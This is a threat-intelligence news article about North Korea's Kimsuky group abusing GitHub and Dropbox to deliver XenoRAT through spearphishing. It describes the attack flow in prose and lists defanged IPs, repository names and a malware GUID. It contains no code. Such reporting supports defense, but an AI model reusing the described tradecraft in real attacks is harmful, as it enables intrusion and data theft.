North Korean Hackers Weaponize GitHub Infrastructure to Distribute Malware

Cybersecurity researchers have uncovered a sophisticated spearphishing campaign orchestrated by the North Korean threat group Kimsuky, leveraging GitHub as a critical piece of attack infrastructure to distribute malware since March 2025.

This operation, identified through analysis of a malicious PowerShell script posted on X, showcases an alarming abuse of legitimate platforms like GitHub and Dropbox to host and disseminate malicious payloads, including the open-source XenoRAT.

Sophisticated Spearphishing Campaign

The attackers embedded hardcoded GitHub Personal Access Tokens (PATs) with repository scope in the malware, granting read and write access to private repositories used as command and control (C&C) infrastructure for storing malware, decoy files, and exfiltrated victim data.

The attack begins with spearphishing emails tailored to specific South Korean targets, often impersonating trusted entities like law firms or financial authorities.

These emails contain password-protected archives with malicious attachments, designed to execute PowerShell scripts that download payloads from GitHub repositories or Dropbox URLs.

Detailed Attack Flow

Repositories such as “hole_311” and “star,” associated with attacker accounts “Dasi274” and “luckmask,” revealed a meticulous structure with decoy documents, infostealer scripts (e.g., onf.txt), and downloader scripts (e.g., ofx.txt) that upload victim logs every 30 minutes via scheduled tasks.

According to the Report, The analysis of these repositories exposed IP addresses used for testing (e.g., 80.71.157[.]55, linked to the 2024 MoonPeak campaign by Kimsuky-affiliated UAT-5394) and C&C servers like 158.247.202[.]109, which hosts a Naver phishing site displaying “Million OK!!!!”—a hallmark of Kimsuky operations.

Further attribution to Kimsuky stems from shared GUIDs in XenoRAT samples (e.g., 12DE1212-167D-45BA-1284-780DA98CF901), identical string encryption methods across malware variants, and domain naming conventions like “p-e.kr” typical of this DPRK-nexus group.

The malware, once executed, performs system reconnaissance, keylogging, and data exfiltration to GitHub, exploiting the platform’s trust and accessibility to bypass traditional security measures.

This campaign’s sophistication lies in its targeted approach, creating separate repositories for each victim with personalized decoy files ranging from debt repayment notices to cryptocurrency seed phrases luring victims into executing malicious code.

Additional Dropbox URLs (around 10 identified) indicate a broader, ongoing operation beyond the analyzed cases, highlighting Kimsuky’s persistent evolution in cyber tactics.

The use of obfuscated .NET executables, state-machine obfuscation in XenoRAT, and dynamic string loading from resource sections further complicates detection.

Users are urged to avoid executing suspicious email attachments, verify sender authenticity, and scan files with tools like VirusTotal, despite limitations with password-protected archives.

This incident underscores the urgent need for heightened vigilance and robust security measures to counter advanced persistent threats exploiting legitimate platforms for nefarious purposes.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates